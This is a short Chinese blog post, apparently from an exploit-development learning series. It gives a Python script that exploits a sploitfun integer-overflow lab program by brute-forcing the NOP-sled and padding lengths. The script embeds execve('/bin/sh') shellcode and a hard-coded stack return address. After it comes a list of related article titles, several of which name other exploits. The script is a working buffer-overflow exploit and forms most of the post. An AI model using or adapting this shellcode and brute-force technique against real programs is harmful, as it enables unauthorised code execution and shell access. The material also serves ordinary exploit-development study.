学习Linux BOF的时候,看了这个文章,https://sploitfun.wordpress.com/2015/06/23/integer-overflow/ ,原文给出的exp无法成功, 此时除了计算并填充buf还可以用其他方法来复现这个问题:

#!/usr/bin/env python

import struct

from subprocess import call

def fuzzme(i,j):

    print i,j

    arg1 = "sploitfun"

#stack address where shellcode is copied.

    ret_addr = 0xbfffefb0 

#spawn a shell

#execve(/bin/sh)

    scode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"

#endianess convertion

    def conv(num):

        return struct.pack("<I",num)

# arg2 = Junk + RA + NOP's + Shellcode

    arg2 = "A" * 24

    arg2 += conv(ret_addr);

    arg2 += "\x90" * i

    arg2 += scode

    arg2 += "C" * j

    print "Calling vulnerable program"

    call(["./vuln", arg1, arg2])

if __name__ == '__main__':

    for i in range(1,300):

        for j in range(1,300):

            fuzzme(i,j)



简单粗暴...

A trick in Exploit Dev的更多相关文章

  1. reds Virtual Memory

    Virtual Memory technical specification This document details the internals of the Redis Virtual Memo ...

  2. redis虚拟内存---官方文档

    http://redis.io/topics/internals-vm Virtual Memory technical specification This document details the ...

  3. BlackArch-Tools

    BlackArch-Tools 简介 安装在ArchLinux之上添加存储库从blackarch存储库安装工具替代安装方法BlackArch Linux Complete Tools List 简介 ...

  4. /dev/socket/vold exploit 本地提权漏洞

    EXPLOIT "0 asec create ../../../../../../../../xxxxx/xx/xx/xx 1 ext4 98235792350852308254872354 ...

  5. An iOS zero-click radio proximity exploit odyssey

    NOTE: This specific issue was fixed before the launch of Privacy-Preserving Contact Tracing in iOS 1 ...

  6. Machine Learning Trick of the Day (2): Gaussian Integral Trick

    Machine Learning Trick of the Day (2): Gaussian Integral Trick Today's trick, the Gaussian integral ...

  7. Machine Learning Trick of the Day (1): Replica Trick

    Machine Learning Trick of the Day (1): Replica Trick 'Tricks' of all sorts are used throughout machi ...

  8. Plain text considered harmful: A cross-domain exploit

    referer:http://balpha.de/2013/02/plain-text-considered-harmful-a-cross-domain-exploit/ Data from aro ...

  9. Android linux kernel privilege escalation vulnerability and exploit (CVE-2014-4322)

    In this blog post we'll go over a Linux kernel privilege escalation vulnerability I discovered which ...

随机推荐

  1. 设置socket接收和发送超时的一种方式

    Linux环境设置Socket接收和发送超时: 须如下定义:struct timeval timeout = {3,0};  //设置发送超时setsockopt(socket,SOL_SOCKET, ...

  2. ibdata1文件损坏时恢复InnoDB单表测试

      Preface       ibdata1 file is a shared system tablespace of innodb engine.Although we always set v ...

  3. 【Selenium-Python】Selenium-Firefox 环境配置 win64

    Python 已安装完毕 Selenium 安装: Windows > cmd pip install selenium 注:未加selenium版本号时默认安装最新版本. 查询当前Seleni ...

  4. 对SE的认识

    对SE的认识 简述 “架构师”,也就是SE,总是给外人一种比较牛逼的感觉,其实踏实做开发的真的很少关注这个title. 抛开这个名词,这个角色的存在的确有一定的意义,因为项目中需要一个能“带领大家前进 ...

  5. MATLAB中矢量场图的绘制 (quiver/quiver3/dfield/pplane) Plot the vector field with MATLAB

    1.quiver函数 一般用于绘制二维矢量场图,函数调用方法如下: quiver(x,y,u,v) 该函数展示了点(x,y)对应的的矢量(u,v).其中,x的长度要求等于u.v的列数,y的长度要求等于 ...

  6. CentOS安装Harbor

    CentOS版本:7.4 Harbor版本:1.5.0 Docker版本:1.12.6 Docker Compose版本:1.21.2 一.安装Harbor(http方式,80端口) 1.安装Dock ...

  7. [leetcode-651-4 Keys Keyboard]

    Imagine you have a special keyboard with the following keys: Key 1: (A): Prints one 'A' on screen. K ...

  8. Go基础篇【第2篇】: 内置库模块 fmt

    fmt官方文档说明:https://studygolang.com/pkgdoc import "fmt" mt包实现了类似C语言printf和scanf的格式化I/O.格式化动作 ...

  9. URAL 1736 Chinese Hockey(网络最大流)

    Description Sergey and Denis closely followed the Chinese Football Championship, which has just come ...

  10. HDU 1028 整数拆分问题 Ignatius and the Princess III

    Ignatius and the Princess III Time Limit: 2000/1000 MS (Java/Others)    Memory Limit: 65536/32768 K ...